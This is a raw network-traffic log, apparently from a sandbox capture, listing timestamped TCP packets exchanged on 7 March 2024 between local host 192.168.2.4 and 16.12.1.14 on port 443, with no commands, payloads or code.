                                        Mar 7, 2024 10:36:11.479043007 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479064941 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479087114 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479096889 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479116917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479121923 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479142904 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479147911 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479161024 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479166985 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479183912 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479197979 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479221106 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479226112 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479234934 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479252100 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479264975 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479269981 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479285955 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479305983 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479310036 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479326963 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479331970 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479342937 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479347944 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479363918 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479367971 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479392052 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479396105 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479408026 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479429960 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479433060 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479444027 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479463100 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479487896 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479492903 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479515076 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479521036 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479523897 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479537964 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479567051 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479578018 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479583979 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479619980 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479626894 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479648113 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479676962 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479681969 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479691029 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479701996 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479711056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479716063 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479733944 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479754925 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479759932 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479774952 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479784012 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479794979 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479799032 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479814053 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479823112 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479846001 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479873896 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479895115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479924917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479929924 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479943037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479950905 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479959011 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479965925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479996920 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480006933 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480012894 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480046034 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480056047 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480056047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480070114 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480087042 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480109930 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480114937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480130911 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480149031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480149984 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480163097 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480192900 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480206013 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480211973 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480243921 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480269909 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480292082 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480320930 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480325937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480334997 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480350018 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480359077 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480365038 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480380058 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480402946 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480407953 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480422974 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480442047 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480444908 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480465889 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480492115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480508089 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480514050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480523109 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480541945 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480550051 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480551004 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480565071 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480596066 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480607986 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480614901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480645895 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480655909 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480685949 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480715990 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480720997 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480730057 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480742931 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480751038 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480757952 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480775118 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480801105 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480804920 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480814934 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480815887 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480837107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480843067 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480854988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480865955 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480880976 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480890989 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480907917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480917931 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480931044 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480936050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480958939 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480971098 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480977058 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481000900 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481018066 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481021881 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481035948 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481040955 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481051922 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481077909 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481097937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481121063 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481152058 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481157064 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481178045 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481180906 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481189013 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481193066 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481210947 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481213093 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481235027 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481240034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481257915 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481278896 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481280088 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481292963 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481312037 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481333017 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481338978 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481358051 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481365919 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481374025 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481383085 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481399059 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481420040 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481426001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.481439114 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.481458902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.790091038 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.790153980 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.790220022 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.790288925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.790354967 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.790355921 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.791110992 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.791167021 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.791208029 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.791222095 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.791258097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.791258097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.792685986 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.792740107 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.792778969 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.792792082 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.792820930 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.792841911 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.794501066 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.794543028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.794580936 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.794593096 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.794620037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.794636965 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.795926094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.795970917 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.796008110 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.796020031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.796046019 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.796066999 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.797466040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.797513008 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.797554016 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.797565937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.797595978 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.797616005 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.798588037 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.798629999 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.798667908 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.798679113 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.798707962 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.798727036 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.800026894 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.800071955 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.800102949 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.800118923 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.800165892 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.800165892 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.800165892 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.801150084 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.801197052 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.801224947 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.801242113 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.801268101 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.801285028 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.802176952 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.802220106 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.802252054 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.802268028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.802294016 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.802310944 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.803276062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.803327084 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.803355932 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.803368092 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.803396940 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.803412914 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.804115057 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.804157972 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.804188967 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.804199934 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.804243088 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.804243088 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.805048943 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.805094004 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.805124044 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.805135965 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.805164099 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.805185080 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.806473017 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.806523085 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.806554079 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.806565046 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.806593895 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.806612968 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.807276011 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.807320118 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.807351112 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.807362080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.807389975 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.807409048 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.808406115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.808465004 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.808492899 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.808509111 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.808533907 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.808549881 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.809346914 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.809396982 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.809425116 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.809436083 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.809465885 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.809490919 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.810142040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.810192108 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.810224056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.810235023 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.810264111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.810283899 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.810983896 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.811024904 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.811058044 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.811074018 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.811099052 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.811120033 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.811866045 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.811914921 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.811947107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.811963081 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.811985970 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.812002897 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.812658072 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.812710047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.812738895 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.812750101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.812778950 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.812794924 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.813527107 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.813570976 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.813596010 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.813607931 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.813636065 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.813654900 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.814263105 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.814305067 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.814336061 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.814353943 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.814379930 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.814399958 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.815114021 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.815160036 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.815188885 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.815200090 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.815227032 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.815246105 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.815942049 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.815984011 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.816011906 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.816026926 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.816051960 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.816068888 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.816858053 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.816901922 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.816927910 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.816945076 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.816972017 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.816972017 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.816996098 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.817769051 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.817811966 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.817841053 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.817852020 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.817883015 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.817902088 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.818806887 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.818847895 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.818877935 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.818892956 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.818917990 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.818937063 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.819689035 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.819736004 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.819763899 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.819780111 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.819802046 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.819818020 CET49729443192.168.2.416.12.1.14
